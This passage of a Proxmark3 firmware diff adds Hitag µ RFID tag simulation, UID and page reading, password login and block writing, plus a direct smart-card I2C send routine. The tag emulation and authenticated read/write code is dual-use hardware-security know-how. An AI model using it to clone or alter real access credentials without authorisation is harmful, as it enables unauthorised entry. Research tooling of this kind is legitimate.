+ * Simulates a Hitag µ Tag with the given data
+ */
+void htu_simulate(bool tag_mem_supplied, int8_t threshold, const uint8_t *data, bool ledcontrol) {
+
+    uint8_t rx[HITAG_FRAME_LEN] = {0};
+    size_t rxlen = 0;
+    uint8_t tx[HITAG_FRAME_LEN];
+    size_t txlen = 0;
+
+    // Free any allocated BigBuf memory
+    BigBuf_free();
+    BigBuf_Clear_ext(false);
+
+    DbpString("Starting Hitag µ simulation");
+
+    // Reset tag state
+    memset(&tag, 0, sizeof(tag));
+    tag.max_page = 64;  // Default maximum page
+    RESET_AUTHENTICATION();
+
+    // Read tag data into memory if supplied
+    if (tag_mem_supplied) {
+        DbpString("Loading Hitag µ memory...");
+        // First 6 bytes are the UID (48 bits)
+        memcpy(tag.uid, data, 6);
+        // Rest is page data
+        memcpy(tag.data.pages, data + 6, sizeof(tag.data.pages));
+    }
+
+    // Update max_page based on configuration
+    update_tag_max_page();
+
+    // Debug output of tag data
+    DBG Dbprintf("UID: %02X%02X%02X%02X%02X%02X", tag.uid[0], tag.uid[1], tag.uid[2], tag.uid[3], tag.uid[4], tag.uid[5]);
+
+    for (int i = 0; i <= tag.max_page; i++) {
+        DBG Dbprintf("Page[%2d]: %02X %02X %02X %02X", i, tag.data.pages[i][0], tag.data.pages[i][1],
+                     tag.data.pages[i][2], tag.data.pages[i][3]);
+    }
+
+    hitag_setup_fpga(0, threshold, ledcontrol);
+
+    int overflow = 0;
+
+    // Simulation main loop
+    while ((BUTTON_PRESS() == false) && (data_available() == false)) {
+        uint32_t start_time = 0;
+
+        WDT_HIT();
+
+        // Receive commands from the reader
+        hitag_tag_receive_frame(rx, sizeof(rx), &rxlen, &start_time, ledcontrol, &overflow);
+
+        // Check if frame was captured and store it
+        if (rxlen > 0) {
+            LogTraceBits(rx, rxlen, start_time, TIMESTAMP, true);
+
+            // Disable timer 1 with external trigger to avoid triggers during our own modulation
+            AT91C_BASE_TC1->TC_CCR = AT91C_TC_CLKDIS;
+
+            // Prepare tag response (tx)
+            memset(tx, 0x00, sizeof(tx));
+            txlen = 0;
+
+            // Process received reader command
+            htu_handle_reader_command(rx, rxlen, tx, &txlen);
+
+            // Wait for HITAG_T_WAIT_RESP carrier periods after the last reader bit,
+            // not that since the clock counts since the rising edge, but T_Wait1 is
+            // with respect to the falling edge, we need to wait actually (T_Wait1 - T_Low)
+            // periods. The gap time T_Low varies (4..10). All timer values are in
+            // terms of T0 units
+            while (AT91C_BASE_TC0->TC_CV < T0 * (HITAG_T_WAIT_RESP - HITAG_T_LOW)) {
+            };
+
+            // Send and store the tag answer (if there is any)
+            if (txlen > 0) {
+                // Transmit the tag frame
+                start_time = TIMESTAMP;
+                hitag_tag_send_frame(tx, txlen, HTU_SOF_BITS, MC4K, ledcontrol);
+                LogTraceBits(tx, txlen, start_time, TIMESTAMP, false);
+            }
+
+            // Enable and reset external trigger in timer for capturing future frames
+            AT91C_BASE_TC1->TC_CCR = AT91C_TC_CLKEN | AT91C_TC_SWTRG;
+
+            // Reset the received frame and response timing info
+            memset(rx, 0x00, sizeof(rx));
+        }
+
+        // Reset the frame length
+        rxlen = 0;
+        // Save the timer overflow, will be 0 when frame was received
+        overflow += (AT91C_BASE_TC1->TC_CV / T0);
+        // Reset the timer to restart while-loop that receives frames
+        AT91C_BASE_TC1->TC_CCR = AT91C_TC_SWTRG;
+    }
+
+    hitag_cleanup(ledcontrol);
+    // Release allocated memory from BigBuf
+    BigBuf_free();
+
+    DbpString("Simulation stopped");
+}
+
+/*
+ * Send command to reader and receive answer from tag
+ */
+static int htu_reader_send_receive(uint8_t *tx, size_t txlen, uint8_t *rx, size_t sizeofrx, size_t *rxlen,
+                                   uint32_t t_wait, bool ledcontrol, uint8_t modulation, uint8_t sof_bits) {
+    // Reset the received frame
+    memset(rx, 0x00, sizeofrx);
+
+    // Disable timer 1 with external trigger to avoid triggers during our own modulation
+    AT91C_BASE_TC1->TC_CCR = AT91C_TC_CLKDIS;
+
+    DBG Dbprintf("tx %d bits:", txlen);
+    DBG Dbhexdump((txlen + 7) / 8, tx, false);
+
+    // Wait until we can send the command
+    while (AT91C_BASE_TC0->TC_CV < T0 * t_wait) {
+    };
+
+    // Set up tracing
+    uint32_t start_time = TIMESTAMP;
+
+    // Send the command - Hitag µ always requires SOF
+    hitag_reader_send_frame(tx, txlen, ledcontrol, true);
+
+    // if (enable_page_tearoff && tearoff_hook() == PM3_ETEAROFF) {
+    //     return PM3_ETEAROFF;
+    // }
+
+    LogTraceBits(tx, txlen, start_time, TIMESTAMP, true);
+
+    // Enable and reset external trigger in timer for capturing future frames
+    AT91C_BASE_TC1->TC_CCR = AT91C_TC_CLKEN | AT91C_TC_SWTRG;
+
+    // Capture response - SOF is automatically stripped by hitag_reader_receive_frame
+    hitag_reader_receive_frame(rx, sizeofrx, rxlen, &start_time, ledcontrol, modulation, sof_bits);
+
+    LogTraceBits(rx, *rxlen, start_time, TIMESTAMP, false);
+    DBG Dbprintf("rx %d bits:", *rxlen);
+    DBG Dbhexdump((*rxlen + 7) / 8, rx, false);
+
+    // TODO: check Error flag
+
+    return PM3_SUCCESS;
+}
+
+/*
+ * Selects a tag using the READ UID, GET SYSTEM INFORMATION, and LOGIN commands
+ */
+static int htu_select_tag(const lf_hitag_data_t *payload, uint8_t *tx, size_t sizeoftx, uint8_t *rx, size_t sizeofrx,
+                          int t_wait, bool ledcontrol) {
+    // Initialize response
+    size_t txlen = 0;
+    size_t rxlen = 0;
+
+    // Setup FPGA and initialize
+    hitag_setup_fpga(FPGA_LF_EDGE_DETECT_READER_FIELD, 127, ledcontrol);
+
+    // Prepare common flags and command variables
+    uint8_t flags = HITAGU_FLAG_CRCT;  // Set appropriate flags for all commands
+    uint8_t command;
+    // uint8_t parameter;
+
+    // 1. Send READ UID command
+    command = HITAGU_CMD_READ_UID;
+    txlen = concatbits(tx, txlen, &flags, 0, 5, true);
+    txlen = concatbits(tx, txlen, &command, 0, 6, true);
+
+    // Append CRC-16 (16 bits)
+    uint16_t crc = Crc16(tx, txlen, 0, CRC16_POLY_CCITT, false, true);
+    txlen = concatbits(tx, txlen, (uint8_t *)&crc, 0, 16, true);
+
+    // lf cmdread -d 64 -z 96 -o 160 -e W2400 -e S224 -e E336 -s 4096 -c W0S00100010000
+
+    // Send the READ UID command and receive the response
+    htu_reader_send_receive(tx, txlen, rx, sizeofrx, &rxlen, t_wait, ledcontrol, MC4K, HTU_SOF_BITS);
+
+    // Check if the response is valid
+    if (rxlen < 1 + 48 + 16 || Crc16(rx, rxlen, 0, CRC16_POLY_CCITT, false, false) != 0) {
+        DBG Dbprintf("Read UID command failed! %i", rxlen);
+        return -2;  // Read UID failed
+    }
+
+    // Process the UID from the response
+    concatbits(tag.uid, 0, rx, 1, 48, false);
+
+    // 2. Send GET SYSTEM INFORMATION command
+    command = HITAGU_CMD_SYSINFO;
+    txlen = 0;  // Reset txlen for the new command
+    txlen = concatbits(tx, txlen, &flags, 0, 5, true);
+    txlen = concatbits(tx, txlen, &command, 0, 6, true);
+
+    // Append CRC-16 (16 bits)
+    crc = Crc16(tx, txlen, 0, CRC16_POLY_CCITT, false, true);
+    txlen = concatbits(tx, txlen, (uint8_t *)&crc, 0, 16, true);
+
+    // Send the GET SYSTEM INFORMATION command and receive the response
+    htu_reader_send_receive(tx, txlen, rx, sizeofrx, &rxlen, HITAG_T_WAIT_SC, ledcontrol, MC4K, HTU_SOF_BITS);
+
+    concatbits(&tag.icr, 0, rx, 9, 8, false);
+
+    // Check if the response is valid
+    if (rxlen < 1 + 16 + 16 || Crc16(rx, rxlen, 0, CRC16_POLY_CCITT, false, false) != 0) {
+        // 8265 bug? sometile lost Data field first bit
+        DBG Dbprintf("Get System Information command failed! %i", rxlen);
+        return -3;  // Get System Information failed
+    }
+
+    // 3. Read config block
+    command = HITAGU_CMD_READ_MULTIPLE_BLOCK;
+    txlen = 0;  // Reset txlen for the new command
+    txlen = concatbits(tx, txlen, &flags, 0, 5, true);
+    txlen = concatbits(tx, txlen, &command, 0, 6, true);
+
+    // Add block address
+    txlen = concatbits(tx, txlen, (uint8_t *)&"\xFF", 0, 8, true);
+
+    // Add number of blocks, 0 means 1 block
+    txlen = concatbits(tx, txlen, (uint8_t *)&"\x00", 0, 8, true);
+
+    // Append CRC-16 (16 bits)
+    crc = Crc16(tx, txlen, 0, CRC16_POLY_CCITT, false, true);
+    txlen = concatbits(tx, txlen, (uint8_t *)&crc, 0, 16, true);
+
+    // Send read command and receive response
+    htu_reader_send_receive(tx, txlen, rx, sizeofrx, &rxlen, HITAG_T_WAIT_SC, ledcontrol, MC4K, HTU_SOF_BITS);
+
+    // Check if the response is valid
+    if (rxlen < 1 + 32 + 16 || Crc16(rx, rxlen, 0, CRC16_POLY_CCITT, false, false) != 0) {
+        DBG Dbprintf("Read config block command failed! %i", rxlen);
+        return -3;  // Read config block failed
+    }
+
+    // Process the config block from the response
+    concatbits(tag.config.asBytes, 0, rx, 1, 32, false);
+    reverse_arraybytes(tag.config.asBytes, HITAGU_BLOCK_SIZE);
+
+    // 4. Send LOGIN command if necessary
+    if (payload && (payload->cmd == HTUF_82xx || payload->cmd == HTUF_PASSWORD)) {
+        command = HITAGU_CMD_LOGIN;  // Set command for login
+        txlen = 0;                   // Reset txlen for the new command
+        txlen = concatbits(tx, txlen, &flags, 0, 5, true);
+        txlen = concatbits(tx, txlen, &command, 0, 6, true);
+
+        txlen = concatbits(tx, txlen, payload->pwd, 0, HITAG_PASSWORD_SIZE * 8, false);
+
+        // Append CRC-16 (16 bits)
+        crc = Crc16(tx, txlen, 0, CRC16_POLY_CCITT, false, true);
+        txlen = concatbits(tx, txlen, (uint8_t *)&crc, 0, 16, true);
+
+        // Send the LOGIN command and receive the response
+        htu_reader_send_receive(tx, txlen, rx, sizeofrx, &rxlen, HITAG_T_WAIT_SC, ledcontrol, MC4K, HTU_SOF_BITS);
+
+        // Check if login succeeded
+        if (rxlen < 1 + 16 || Crc16(rx, rxlen, 0, CRC16_POLY_CCITT, false, false) != 0) {
+            DBG Dbprintf("Login command failed! %i", rxlen);
+            return -4;  // Login failed
+        } else {
+            DBG DbpString("Login successful");
+        }
+
+        // flags |= HITAGU_FLAG_ADR;
+        // command = HITAGU_CMD_LOGIN;  // Set command for login
+        // txlen = 0;                   // Reset txlen for the new command
+        // txlen = concatbits(tx, txlen, &flags, 0, 5, true);
+        // txlen = concatbits(tx, txlen, &command, 0, 6, true);
+
+        // txlen = concatbits(tx, txlen, payload->uid, 0, HITAGU_UID_SIZE * 8, false);
+        // txlen = concatbits(tx, txlen, payload->pwd, 0, HITAG_PASSWORD_SIZE * 8, false);
+
+        // // Append CRC-16 (16 bits)
+        // crc = Crc16(tx, txlen, 0, CRC16_POLY_CCITT, false, true);
+        // txlen = concatbits(tx, txlen, (uint8_t *)&crc, 0, 16, true);
+
+        // // Send the LOGIN command and receive the response
+        // htu_reader_send_receive(tx, txlen, rx, sizeofrx, &rxlen, HITAG_T_WAIT_SC, ledcontrol, MC4K, HTU_SOF_BITS);
+
+        // // Check if login succeeded
+        // if (rxlen < 1 + 16 || Crc16(rx, rxlen, 0, CRC16_POLY_CCITT, false, false) != 0) {
+        //     DBG Dbprintf("Login command failed! %i", rxlen);
+        //     return -3;  // Login failed
+        // } else {
+        //     DbpString("Login successful");
+        // }
+    }
+
+    // If all commands are successful, update the tag's state
+    update_tag_max_page();  // Update max_page based on the new configuration
+
+    return 0;  // Selection successful
+}
+
+/*
+ * Reads the UID of a Hitag µ tag using the INVENTORY command
+ */
+int htu_read_uid(uint64_t *uid, bool ledcontrol, bool send_answer) {
+    // Initialize response
+    uint8_t rx[HITAG_FRAME_LEN] = {0x00};
+    uint8_t tx[HITAG_FRAME_LEN] = {0x00};
+    int status = PM3_SUCCESS;
+
+    // Use htu_select_tag to select the card and retrieve UID
+    int reason = htu_select_tag(NULL, tx, ARRAYLEN(tx), rx, ARRAYLEN(rx), HITAG_T_WAIT_FIRST, ledcontrol);
+    if (reason != 0) {
+        DBG DbpString("Error: htu_read_uid Failed to select tag");
+        status = PM3_ERFTRANS;
+        goto exit;
+    }
+
+    DBG Dbprintf("HitagU UID: %02X%02X%02X%02X%02X%02X", tag.uid[0], tag.uid[1], tag.uid[2], tag.uid[3], tag.uid[4], tag.uid[5]);
+
+    if (uid) {
+        *uid = MemBeToUint6byte(tag.uid);
+    }
+
+exit:
+    hitag_cleanup(ledcontrol);
+
+    if (send_answer) {
+        // Send UID
+        reply_reason(CMD_LF_HITAGU_UID, status, reason, tag.uid, sizeof(tag.uid));
+    }
+
+    // Reset authentication state
+    RESET_AUTHENTICATION();
+
+    return status;
+}
+
+/*
+ * Reads a Hitag µ tag
+ */
+void htu_read(const lf_hitag_data_t *payload, bool ledcontrol) {
+    size_t rxlen = 0;
+    uint8_t rx[HITAG_FRAME_LEN] = {0x00};
+    size_t txlen = 0;
+    uint8_t tx[HITAG_FRAME_LEN] = {0x00};
+    int status = PM3_SUCCESS;
+
+    // DBG {
+    //     DbpString("htu_read");
+    //     Dbprintf("payload->page: %d", payload->page);
+    //     Dbprintf("payload->page_count: %d", payload->page_count);
+    //     Dbprintf("payload->cmd: %d", payload->cmd);
+    //     Dbprintf("payload->uid: %02X%02X%02X%02X%02X%02X", payload->uid[0], payload->uid[1], payload->uid[2],
+    //              payload->uid[3], payload->uid[4], payload->uid[5]);
+    //     Dbprintf("payload->key: %02X%02X%02X%02X%02X%02X", payload->key[0], payload->key[1], payload->key[2],
+    //              payload->key[3], payload->key[4], payload->key[5]);
+    //     Dbprintf("payload->pwd: %02X%02X%02X%02X", payload->pwd[0], payload->pwd[1], payload->pwd[2], payload->pwd[3]);
+    // }
+
+    // Use htu_select_tag to select the card and retrieve UID
+    int reason = htu_select_tag(payload, tx, ARRAYLEN(tx), rx, ARRAYLEN(rx), HITAG_T_WAIT_FIRST, ledcontrol);
+    if (reason != 0) {
+        DbpString("Error: htu_read Failed to select tag");
+        status = PM3_ERFTRANS;
+        goto exit;
+    }
+
+    lf_htu_read_response_t card = {
+        .icr = tag.icr,
+    };
+    memcpy(card.uid, tag.uid, HITAGU_UID_SIZE);
+    memcpy(card.config_page.asBytes, tag.config.asBytes, HITAGU_BLOCK_SIZE);
+
+    uint8_t page_count_index = payload->page_count - 1;
+
+    if (payload->page_count == 0) {
+        page_count_index = tag.max_page - payload->page - 1;
+    }
+
+    // Step 2: Process the actual command
+    // Add flags (5 bits)
+    uint8_t flags = HITAGU_FLAG_CRCT;
+    txlen = concatbits(tx, txlen, &flags, 0, 5, true);
+
+    // Read command format: <flags> <command> [UID] <block address> <number of blocks> [CRC-16]
+
+    // Add command (6 bits)
+    uint8_t command = HITAGU_CMD_READ_MULTIPLE_BLOCK;
+    txlen = concatbits(tx, txlen, &command, 0, 6, true);
+
+    // The 8265 chip has known issues when reading multiple blocks:
+    // - page_count = 1: Works correctly
+    // - page_count >= 2: Data field is left shifted by 1 bit
+    // - page_count = 2 or page+page_count exceeds valid page: Data field has an extra '1' bit
+    // - page_count = 3,4: Data field last bit is always '1'
+    // - page_count = 5: CRC is not appended
+    // - page_count >= 6: May cause next command to have no response
+    // Workaround: Read one block at a time
+    if (payload->mode == 0 /**for debug */
+            && (payload->cmd == HTUF_82xx || tag.icr == HITAGU_ICR_8265 || !memcmp(tag.uid, "\x00\x00\x00\x00\x00\x00", 6))) {
+
+        uint8_t page_addr;
+        for (int i = 0; i <= page_count_index; i++) {
+            page_addr = payload->page + i;
+
+            txlen = 5 + 6;  // restore txlen for the new command
+            txlen = concatbits(tx, txlen, &page_addr, 0, 8, true);
+
+            // Add number of blocks, 0 means 1 block
+            txlen = concatbits(tx, txlen, (uint8_t *)&"\x00", 0, 8, true);
+
+            // Append CRC-16 (16 bits)
+            uint16_t crc = Crc16(tx, txlen, 0, CRC16_POLY_CCITT, false, true);
+            txlen = concatbits(tx, txlen, (uint8_t *)&crc, 0, 16, true);
+
+            // Send read command and receive response
+            htu_reader_send_receive(tx, txlen, rx, ARRAYLEN(rx), &rxlen, HITAG_T_WAIT_SC, ledcontrol, MC4K, HTU_SOF_BITS);
+
+            if (flags & HITAGU_FLAG_CRCT && Crc16(rx, rxlen, 0, CRC16_POLY_CCITT, false, false) != 0) {
+                DBG Dbprintf("Error: response CRC invalid");
+                card.pages_reason[i] = -6;
+                continue;
+            }
+
+            // Check response
+            if (rxlen < 1 + HITAGU_BLOCK_SIZE * 8 + (flags & HITAGU_FLAG_CRCT ? 16 : 0)) {
+                DbpString("Error: invalid response received after read command");
+                card.pages_reason[i] = -7;
+            } else {
+                DBG Dbprintf("Read successful, response: %d bits", rxlen);
+                // todo: For certain pages, update our cached data
+                card.pages_reason[i] = 1;
+                concatbits(card.pages[i], 0, rx, 1, HITAGU_BLOCK_SIZE * 8, false);
+            }
+        }
+    } else {
+        txlen = concatbits(tx, txlen, &payload->page, 0, 8, true);
+
+        // Add number of blocks, 0 means 1 block
+        txlen = concatbits(tx, txlen, &page_count_index, 0, 8, true);
+
+        // Append CRC-16 (16 bits)
+        uint16_t crc = Crc16(tx, txlen, 0, CRC16_POLY_CCITT, false, true);
+        txlen = concatbits(tx, txlen, (uint8_t *)&crc, 0, 16, true);
+
+        // Send read command and receive response
+        htu_reader_send_receive(tx, txlen, rx, ARRAYLEN(rx), &rxlen, HITAG_T_WAIT_SC, ledcontrol, MC4K, HTU_SOF_BITS);
+
+        if (flags & HITAGU_FLAG_CRCT && Crc16(rx, rxlen, 0, CRC16_POLY_CCITT, false, false) != 0) {
+            DBG Dbprintf("Error: response CRC invalid");
+            status = PM3_ERFTRANS;
+            goto exit;
+        }
+
+        // Check response
+        if (rxlen < 1 + HITAGU_BLOCK_SIZE * 8 + (flags & HITAGU_FLAG_CRCT ? 16 : 0)) {
+            DbpString("Error: invalid response received after read command");
+            status = PM3_ERFTRANS;
+        } else {
+            DBG Dbprintf("Read successful, response: %d bits", rxlen);
+            // todo: For certain pages, update our cached data
+            concatbits((uint8_t *)card.pages, 0, rx, 1, rxlen - 1 - 16, false);
+            for (int i = 0; i < (rxlen - 1 - 16) / (HITAGU_BLOCK_SIZE * 8); i++) {
+                card.pages_reason[i] = 1;
+            }
+        }
+    }
+
+exit:
+    hitag_cleanup(ledcontrol);
+    // Send status to client
+    reply_reason(CMD_LF_HITAGU_READ, status, reason, (uint8_t *)&card, sizeof(card));
+}
+
+/*
+ * Writes a page to a Hitag µ tag
+ */
+void htu_write_page(const lf_hitag_data_t *payload, bool ledcontrol) {
+    size_t rxlen = 0;
+    uint8_t rx[HITAG_FRAME_LEN] = {0x00};
+    size_t txlen = 0;
+    uint8_t tx[HITAG_FRAME_LEN] = {0x00};
+    int status = PM3_SUCCESS;
+
+    // DBG {
+    //     DbpString("htu_write_page");
+    //     Dbprintf("payload->page: %d", payload->page);
+    //     Dbprintf("payload->data: %02X%02X%02X%02X", payload->data[0], payload->data[1], payload->data[2], payload->data[3]);
+    //     Dbprintf("payload->cmd: %d", payload->cmd);
+    //     Dbprintf("payload->uid: %02X%02X%02X%02X%02X%02X", payload->uid[0], payload->uid[1], payload->uid[2], payload->uid[3], payload->uid[4], payload->uid[5]);
+    //     Dbprintf("payload->key: %02X%02X%02X%02X%02X%02X", payload->key[0], payload->key[1], payload->key[2], payload->key[3], payload->key[4], payload->key[5]);
+    //     Dbprintf("payload->pwd: %02X%02X%02X%02X", payload->pwd[0], payload->pwd[1], payload->pwd[2], payload->pwd[3]);
+    //     Dbprintf("payload->mode: %d", payload->mode);
+    // }
+
+    int reason = htu_select_tag(payload, tx, ARRAYLEN(tx), rx, ARRAYLEN(rx), HITAG_T_WAIT_FIRST, ledcontrol);
+    if (reason != 0) {
+        status = PM3_ERFTRANS;
+        goto exit;
+    }
+
+    // Step 2: Send write command
+    uint8_t flags = HITAGU_FLAG_CRCT;
+
+    // Add flags (5 bits) for write operation
+    txlen = concatbits(tx, txlen, &flags, 0, 5, true);
+
+    // Add write command (6 bits)
+    uint8_t command = HITAGU_CMD_WRITE_SINGLE_BLOCK;
+    txlen = concatbits(tx, txlen, &command, 0, 6, true);
+
+    // Add page address (8 bits)
+    txlen = concatbits(tx, txlen, &payload->page, 0, 8, true);
+
+    // Add data to write (32 bits)
+    txlen = concatbits(tx, txlen, payload->data, 0, 32, false);
+
+    // Append CRC-16 (16 bits)
+    uint16_t crc = Crc16(tx, txlen, 0, CRC16_POLY_CCITT, false, true);
+    txlen = concatbits(tx, txlen, (uint8_t *)&crc, 0, 16, true);
+
+    DBG Dbprintf("Writing to page 0x%02X", payload->page);
+
+    // Send write command and receive response
+    htu_reader_send_receive(tx, txlen, rx, ARRAYLEN(rx), &rxlen, HITAG_T_WAIT_SC, ledcontrol, MC4K, HTU_SOF_BITS);
+
+    // Check response
+    if (payload->cmd == HTUF_82xx && rxlen == 0) {
+        // 8265 bug? no response on successful write command
+        reason = 0;
+        status = PM3_ENODATA;
+    } else if (rxlen != 1 + 16) {
+        DbpString("Error: htu_write_page No valid response received after write command");
+        reason = -5;
+        status = PM3_ERFTRANS;
+    } else {
+        DBG Dbprintf("Write successful, response: %d bits", rxlen);
+    }
+
+exit:
+    hitag_cleanup(ledcontrol);
+    reply_reason(CMD_LF_HITAGU_WRITE, status, reason, NULL, 0);
+}

armsrc/hitagu.h

@@ -0,0 +1,30 @@
+//-----------------------------------------------------------------------------
+// Copyright (C) Proxmark3 contributors. See AUTHORS.md for details.
+//
+// This program is free software: you can redistribute it and/or modify
+// it under the terms of the GNU General Public License as published by
+// the Free Software Foundation, either version 3 of the License, or
+// (at your option) any later version.
+//
+// This program is distributed in the hope that it will be useful,
+// but WITHOUT ANY WARRANTY; without even the implied warranty of
+// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
+// GNU General Public License for more details.
+//
+// See LICENSE.txt for the text of the license.
+//-----------------------------------------------------------------------------
+// Hitag µ functions
+//-----------------------------------------------------------------------------
+
+#ifndef _HITAGU_H_
+#define _HITAGU_H_
+
+#include "common.h"
+#include "hitag.h"
+
+void htu_simulate(bool tag_mem_supplied, int8_t threshold, const uint8_t *data, bool ledcontrol);
+void htu_read(const lf_hitag_data_t *payload, bool ledcontrol);
+void htu_write_page(const lf_hitag_data_t *payload, bool ledcontrol);
+int htu_read_uid(uint64_t *uid, bool ledcontrol, bool send_answer);
+
+#endif

armsrc/i2c.c

@@ -783,7 +783,6 @@ bool GetATR(smart_card_atr_t *card_ptr, bool verbose) {
         return false;
     }
 
-
     card_ptr->atr_len = 0;
     memset(card_ptr->atr, 0, sizeof(card_ptr->atr));
 
@@ -858,7 +857,7 @@ void SmartCardRaw(const smart_card_raw_t *p) {
     LED_D_ON();
 
     uint16_t len = 0;
-    uint8_t *resp = BigBuf_malloc(ISO7816_MAX_FRAME);
+    uint8_t *resp = BigBuf_calloc(ISO7816_MAX_FRAME);
     // check if alloacted...
     smartcard_command_t flags = p->flags;
 
@@ -938,7 +937,7 @@ void SmartCardUpgrade(uint64_t arg0) {
     bool isOK = true;
     uint16_t length = arg0, pos = 0;
     const uint8_t *fwdata = BigBuf_get_addr();
-    uint8_t *verfiydata = BigBuf_malloc(I2C_BLOCK_SIZE);
+    uint8_t *verfiydata = BigBuf_calloc(I2C_BLOCK_SIZE);
 
     while (length) {
 

armsrc/i2c.h

@@ -36,7 +36,7 @@
 // 8051 speaks with smart card.
 // 1000*50*3.07   = 153.5ms
 // 1 byte transfer == 1ms with max frame being 256 bytes
-#define SIM_WAIT_DELAY  88000 // about 270ms delay // 109773 -- about 337.7ms delay
+#define SIM_WAIT_DELAY  150000 // about 270ms delay // 109773 -- about 337.7ms delay
 
 
 void I2C_recovery(void);

armsrc/i2c_direct.c

@@ -0,0 +1,205 @@
+// //-----------------------------------------------------------------------------
+// Copyright (C) Proxmark3 contributors. See AUTHORS.md for details.
+//
+// This program is free software: you can redistribute it and/or modify
+// it under the terms of the GNU General Public License as published by
+// the Free Software Foundation, either version 3 of the License, or
+// (at your option) any later version.
+//
+// This program is distributed in the hope that it will be useful,
+// but WITHOUT ANY WARRANTY; without even the implied warranty of
+// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
+// GNU General Public License for more details.
+//
+// See LICENSE.txt for the text of the license.
+//-----------------------------------------------------------------------------
+// The main i2c code, for communications with smart card module
+//-----------------------------------------------------------------------------
+
+#include <inttypes.h>
+
+#include "BigBuf.h"
+#include "iso14443a.h"
+#include "BigBuf.h"
+#include "string.h"
+#include "mifareutil.h"
+#include "fpgaloader.h"
+#include "proxmark3_arm.h"
+#include "cmd.h"
+#include "protocols.h"
+#include "appmain.h"
+#include "util.h"
+#include "commonutil.h"
+#include "crc16.h"
+#include "dbprint.h"
+#include "ticks.h"
+#include "i2c.h"
+#include "i2c_direct.h"
+
+static void SmartCardDirectSend(uint8_t prepend, const smart_card_raw_t *p, uint8_t *output, uint16_t *olen) {
+    LED_D_ON();
+
+    uint16_t len = 0;
+    uint8_t *resp = BigBuf_calloc(ISO7816_MAX_FRAME);
+    resp[0] = prepend;
+    // check if alloacted...
+    smartcard_command_t flags = p->flags;
+
+    if ((flags & SC_LOG) == SC_LOG)
+        set_tracing(true);
+    else
+        set_tracing(false);
+
+    if ((flags & SC_CONNECT) == SC_CONNECT) {
+
+        I2C_Reset_EnterMainProgram();
+
+        if ((flags & SC_SELECT) == SC_SELECT) {
+            smart_card_atr_t card;
+            bool gotATR = GetATR(&card, true);
+
+            if (gotATR == false) {
+                Dbprintf("No ATR received...\n");
+                goto OUT;
+            }
+        }
+    }
+
+    uint32_t wait = SIM_WAIT_DELAY;
+
+    if (((flags & SC_RAW) == SC_RAW) || ((flags & SC_RAW_T0) == SC_RAW_T0)) {
+
+        if ((flags & SC_WAIT) == SC_WAIT) {
+            wait = (uint32_t)((p->wait_delay * 1000) / 3.07);
+        }
+
+        LogTrace(p->data, p->len, 0, 0, NULL, true);
+
+        bool res = I2C_BufferWrite(
+                       p->data,
+                       p->len,
+                       (((flags & SC_RAW_T0) == SC_RAW_T0) ? I2C_DEVICE_CMD_SEND_T0 : I2C_DEVICE_CMD_SEND),
+                       I2C_DEVICE_ADDRESS_MAIN
+                   );
+
+        if (res == false && g_dbglevel > 3) {
+            Dbprintf("SmartCardDirectSend: I2C_BufferWrite failed\n");
+            goto OUT;
+        }
+
+        // read bytes from module
+        len = ISO7816_MAX_FRAME;
+        res = sc_rx_bytes(&resp[1], &len, wait);
+        if (res) {
+            LogTrace(&resp[1], len, 0, 0, NULL, false);
+        } else {
+            len = 0;
+        }
+    }
+
+    if (len == 2 && resp[1] == 0x61) {
+        uint8_t cmd_getresp[] = {0x00, ISO7816_GET_RESPONSE, 0x00, 0x00, resp[2]};
+
+        smart_card_raw_t *payload = (smart_card_raw_t *)BigBuf_calloc(sizeof(smart_card_raw_t) + sizeof(cmd_getresp));
+        payload->flags = SC_RAW | SC_LOG;
+        payload->len = sizeof(cmd_getresp);
+        payload->wait_delay = 0;
+        memcpy(payload->data, cmd_getresp, sizeof(cmd_getresp));
+
+        SmartCardDirectSend(prepend, payload, output, olen);
+    } else if (len == 2) {
+        Dbprintf("***** BAD response from card (response unsupported)...");
+        Dbhexdump(3, &resp[0], false);
+        resp[0] = prepend;
+        resp[1] = 0x6a;
+        resp[2] = 0x82;
+        AddCrc14A(resp, 3);
+
+        memcpy(output, resp, 5);
+        *olen = 5;
+    }
+
+    if (resp[1] == 0x6a && resp[2] == 0x82) {
+        Dbprintf("***** bad response from card (file not found)...");
+        resp[0] = prepend;
+        resp[1] = 0x6a;
+        resp[2] = 0x82;
+        AddCrc14A(resp, 3);
+
+        memcpy(output, resp, 5);
+        *olen = 5;
+        FpgaDisableTracing();
+    }
+
+    if (len > 2) {
+        Dbprintf("***** sending it over the wire... len: %d =>\n", len);
+        resp[1] = prepend;
+
+        AddCrc14A(&resp[1], len);
+        Dbhexdump(len + 2, &resp[1], false);
+
+        BigBuf_free();
+
+        if (prepend == 0xff) {
+            Dbprintf("pdol request, we can ignore the response...");
+            return;
+        }
+
+        memcpy(output, &resp[1], len + 2);
+        *olen = len + 2;
+
+        BigBuf_free();
+    }
+
+OUT:
+    LEDsoff();
+}
+
+int CmdSmartRaw(const uint8_t prepend, const uint8_t *data, int dlen, uint8_t *output, uint16_t *olen) {
+
+    Dbprintf("sending command to smart card... %02x %02x %02x... =>", prepend, data[0], data[1]);
+    Dbhexdump(dlen, data, false);
+
+    if (data[4] + 5 != dlen) {
+        Dbprintf("invalid length of data. Received: %d, command specifies %d", dlen, data[4] + 5);
+        dlen = data[4] + 5;
+    }
+
+    smart_card_raw_t *payload = (smart_card_raw_t *)BigBuf_calloc(sizeof(smart_card_raw_t) + dlen);
+    if (payload == NULL) {
+        Dbprintf("Failed to allocate memory");
+        return PM3_EMALLOC;
+    }
+
+    payload->len = dlen;
+    memcpy(payload->data, data, dlen);
+
+    payload->flags = SC_LOG;
+    bool active = true;
+    bool active_select = false;
+    int timeout = 600;
+    bool use_t0 = true;
+
+    if (active || active_select) {
+        payload->flags |= (SC_CONNECT | SC_CLEARLOG);
+        if (active_select)
+            payload->flags |= SC_SELECT;
+    }
+
+    payload->wait_delay = 0;
+    if (timeout > -1) {
+        payload->flags |= SC_WAIT;
+        payload->wait_delay = timeout;
+    }
+
+    if (dlen > 0) {
+        if (use_t0)
+            payload->flags |= SC_RAW_T0;
+        else
+            payload->flags |= SC_RAW;
+    }
+
+    SmartCardDirectSend(prepend, payload, output, olen);
+
+    return PM3_SUCCESS;
+}

armsrc/i2c_direct.h

@@ -1,5 +1,4 @@
 //-----------------------------------------------------------------------------
-// Copyright (C) Stephen Shkardoon proxmark@ss23.geek.nz - ss23
